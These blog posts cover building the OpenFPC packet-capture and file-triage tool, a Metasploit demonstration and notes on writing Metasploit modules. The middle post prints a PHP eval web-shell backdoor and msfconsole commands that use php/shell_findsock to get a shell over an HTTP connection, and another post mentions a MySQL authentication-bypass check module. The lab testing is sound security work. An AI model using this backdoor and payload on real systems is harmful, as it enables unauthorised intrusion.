daemonlogger, forensics, fpcgui, Information, Linux Distributions, Metasploit, OpenFPC, OpenSourceSoftware, Security, Ubuntu


In early June, Leon Ward and I teamed up in Oslo to chat about his OpenFPC and my FPCGUI project. I met Leon for the first time in April 2009 at Sourcefire's offices in Wokingham, UK, and I have chatted with him now and then on IRC etc. since then.

I started using Sourcefire 3D in December 2008, and the first thing I missed was pcaps for the events I got. The second was the real-time view that you get in Sguil (I can live without that, though).

So I needed a second host that did full packet capture alongside my new IPS/IDS. Just running tcpdump/daemonlogger/sancp is OK for a small installation, but carving out the sessions manually was taking time. I needed to script something with an easy interface, so I could quickly get a pcap of the whole session an event came from. So I was thinking of an API and an easy way to add this to the Sourcefire 3D WebGUI.

My PoC was FPCGUI (Full Packet Capture Graphical User Interface). It takes a query in the URL, searches the flow data in its database and gives you the session details if they exist. If you click on the session, you get the pcap served straight in your face, and I chose to open my pcaps with Wireshark. With a little Greasemonkey magic, this would have been an OK solution for satisfying my pcap needs when working with SF3D.

I made my thoughts public in a blog post in September 2009 and started coding right away. I also discussed FPCGUI with Leon the day after I posted the blog. The first release that worked well enough for me was in January 2010. Leon released his project in May 2010, and I quickly saw that we were doing more or less the same thing. He had implemented the distributed node part, which I had not even started to draft, and I had the WebGUI and the flow data, which gives more meaning and is more user friendly to the analyst.

So, instead of working on two separate projects (aiming for the same goal), we decided to join forces and merge the two projects. And as I thought that OpenFPC is a better name than FPCGUI, OpenFPC it is 🙂

I have merged my parts slowly into OpenFPC during the summer; with vacation time and a job change, I did not have much time for coding on the side. We also re-factored much of the code, file names etc., so getting things into a working condition has been the main task.

As of the last few weeks, I can now install OpenFPC and use it the way I want to again, like I did with FPCGUI. The plus is that I now have a command line interface, a distributed architecture (not WebGUI friendly yet), and a way to automagically extract pcaps and the files in them, for automatic analysis 🙂

To test my dream of automatic analysis, I used a setup similar to this earlier blog post where I more or less did the same. I carve the pcap with openfpc-client (triggered by an event from an IDS or nftracker), extract files with tcpxtract (or similar tools), scan the files with ClamAV and also check their md5/sha sums against shadowserver, VirusTotal or wepawet. I tried some different infected and non-infected PDF files. All the files I had to test with were detected by ClamAV, even my home-grown Metasploit PDF. All the known bad PDF files were detected by checking their md5/sha sums against the different services (shadow/VT/wepawet), but again, only ClamAV detected my home-made Metasploit PDF:
evil.pdf: Heuristics.PDF.ObfuscatedNameObject FOUND
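The last step of that pipeline, hashing the carved files for the hash-lookup services and merging in the ClamAV verdicts, as an added example in Python (not OpenFPC's own code). The carved file and the clamscan report it parses are constructed inline in the same `path: SIGNATURE FOUND` format as the line above:

```python
"""Triage files carved from an OpenFPC pcap: hash them for lookups and
merge the ClamAV verdicts. Added example, not OpenFPC's own code; the
clamscan output used below is constructed in the clamscan report format."""
import hashlib
import os
import re
import tempfile

# One clamscan result line: "<path>: <signature> FOUND" or "<path>: OK".
CLAM_LINE = re.compile(r"^(?P<path>.+?): (?:(?P<sig>.+) FOUND|OK)$")


def hash_file(path):
    """md5/sha1/sha256 hex digests: the keys hash-lookup services accept."""
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            for h in digests.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in digests.items()}


def parse_clamscan(output):
    """Map each scanned path to its signature name, or None when clean."""
    verdicts = {}
    for line in output.splitlines():
        m = CLAM_LINE.match(line.strip())
        if m:  # summary lines such as "Infected files: 1" do not match
            verdicts[m.group("path")] = m.group("sig")
    return verdicts


def triage(paths, clamscan_output):
    """One record per carved file: path, ClamAV verdict and its hashes."""
    verdicts = parse_clamscan(clamscan_output)
    return [{"path": p, "clamav": verdicts.get(p), **hash_file(p)} for p in paths]


def demo():
    """Constructed input: a fake carved PDF plus a clamscan report on it."""
    workdir = tempfile.mkdtemp()
    evil = os.path.join(workdir, "evil.pdf")
    with open(evil, "wb") as fh:
        fh.write(b"%PDF-1.4\n% constructed sample, not real malware\n")
    report = (
        f"{evil}: Heuristics.PDF.ObfuscatedNameObject FOUND\n"
        "\n----------- SCAN SUMMARY -----------\nInfected files: 1\n"
    )
    return triage([evil], report)
```

In a real run the report text would come from `clamscan` over the tcpxtract output directory, and the digests would be submitted to the lookup services.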

So, now I will have more events to live with 🙂

Back|Track, Debian, Metasploit, OpenSourceSoftware, Security, Ubuntu

Spawning a shell on the established connection to the webserver in Metasploit.

A good firewall setup has ingress and egress filtering. On a new setup, I like to set very strict rules for incoming and outgoing traffic. When setting up a new LAMP server etc., making sure it can only connect out to the places it needs access to is good security practice. Then open port 80 for connections from the world, minus .ru and .cn etc. 🙂

So I thought…

Then egypt, from Metasploit, made the “php/shell_findsock” payload and presented it to me, which I think is awesome!

If you can get the LAMP server to execute the shell_findsock payload in some way, you can in many cases get a shell over the established HTTP connection! You can also use the payload with the other PHP exploits in the framework.

egypt states that “this payload leaves conspicuous evil-looking entries in the apache error logs”, but I did not get any on my Debian Etch test server. On my Ubuntu Intrepid, though, I got:
sh: Syntax error: Bad fd number
Invalid method in request exit

egypt also states: “The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache”
My test on a plain fresh install of Ubuntu 8.10 (Intrepid Ibex) shows that it works.

In the test case, I left my “backdoor” on the server in test.php with the code: <?php eval($_GET['evalme']); ?>, which is the default this Metasploit module expects.
Short version:

msf > use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set PAYLOAD php/shell_findsock
msf exploit(php_eval) > set RHOST http://www.gamelinux.org
msf exploit(php_eval) > exploit

Metasploit with payload php/shell_findsock

And you thought that you were safe!

On my Debian Etch box, the Suhosin patch stopped the attack; on my Ubuntu Intrepid it did not.
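The CLOEXEC detail egypt mentions is the whole story here, so as an added, defender-side example (my own illustration, not Metasploit's code) this Python snippet checks the flag on a socket descriptor and shows what happens to a child process spawned with and without it; it assumes a Unix host and uses a child Python interpreter as a stand-in for the shell:

```python
"""Why php/shell_findsock can work: a socket whose FD_CLOEXEC flag is clear
survives exec() into a child such as a shell. Added example, not Metasploit's
code; it checks a descriptor's flag and shows the effect on a spawned child."""
import fcntl
import os
import socket
import subprocess
import sys


def survives_exec(fd):
    """True when FD_CLOEXEC is clear, i.e. the fd would be inherited by exec()."""
    return not (fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC)


def set_cloexec(fd):
    """The mitigation egypt refers to: mark the descriptor close-on-exec."""
    flags = fcntl.fcntl(fd, fcntl.F_GETFD)
    fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)


def child_can_see(fd):
    """Exec a child interpreter (stand-in for the shell) and report whether the
    inherited descriptor is still valid there, i.e. fstat() on it succeeds."""
    probe = "import os, sys; os.fstat(int(sys.argv[1]))"
    proc = subprocess.run(
        [sys.executable, "-c", probe, str(fd)],
        close_fds=False,  # like a server that does not scrub fds before exec
        stderr=subprocess.DEVNULL,
    )
    return proc.returncode == 0


def demo():
    """Return ((flag clear, child sees fd) before the fix, same pair after)."""
    sock = socket.socket()  # stands in for the web server's connection socket
    fd = sock.fileno()
    os.set_inheritable(fd, True)  # emulate the unpatched state: CLOEXEC not set
    before = (survives_exec(fd), child_can_see(fd))
    set_cloexec(fd)  # hardened state: the child no longer inherits the socket
    after = (survives_exec(fd), child_can_see(fd))
    sock.close()
    return before, after
```

Auditing a running web server the same way (checking the flag on its socket descriptors) tells you whether a spawned child could reach the client connection at all.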

Metasploit, OpenSourceSoftware, Security

Making one's own modules in the Metasploit Framework 3.3-dev

I have been spending some time digging into the Metasploit Framework the last two days. I first downloaded Metasploit at the beginning of this year, and simply used/tested it at home or in the lab at work. Metasploit is under rather rapid development, and I don't know how the lads developing Metasploit have time to sleep…

Well, after poking my hands into it for two days, I finally made myself an Auxiliary and an “Exploit”! That includes laying my hands on Ruby for the first time in my life.

The Auxiliary I made is a simple MySQL login. It uses the username root by default, with no password (well, someone probably has 'root'@'%'). I'm working on making it more dynamic, because right now one cannot change the password, as I haven't got Ruby in my blood yet :/ and keep bumping into minor challenges.

The “exploit” I did was just to see if I could make one, and as I was playing with MySQL… I implemented the MySQL Authentication Bypass vulnerability found by NGSSecurity and published in July 2004 (so old that it has to be legal to make such an exploit?).
I have not done a mysql-cli inside the msf, so it really only checks for the vulnerability (logs in and exits). It does not give you a shell or load any payloads or whatever.

Looking at the other Auxiliaries and Exploits in the msf3.3-dev framework, it was surprisingly easy to get something up and running. This is truly a great framework. (This is the place to start if you want to develop something of your own!)

Here are some bumps I ran into along the way, and also mental notes to myself:

* Place all your custom-made stuff here: ~/.msf3/modules/

* Make your own Modules/Auxiliary/Stuff in
Where <TYPE> is exploit/payload/encoder/nop/auxiliary.
This is new behavior in 3.2/3.3-dev and is not documented yet.

* There are two ways to add a core resource:
1) If you really want to, the way to do it is by setting the MSF_LOCAL_LIB
environment variable to something like ~/.msf3/lib and then creating
~/.msf3/lib/msf/core/exploit/yourstuff.rb and in your exploit module, doing:
require "msf/core/exploit/yourstuff"
include Exploit::Remote::Yourstuff

2) Just add it to msf3.3/lib/msf/core/exploit/yourstuff.rb and “require” it in msf3.3/lib/msf/core/exploit.rb

I hope, and I strongly recommend, that people contribute modules to the Metasploit framework. It would also be great to see more PoCs released in the MSF, now that MSF is under such a nice and free BSD license 🙂

I would like to thank H D Moore for taking the time to answer my n00b emails and my questions in such a good, patient and quick way. (And I believe he is on vacation too!!!)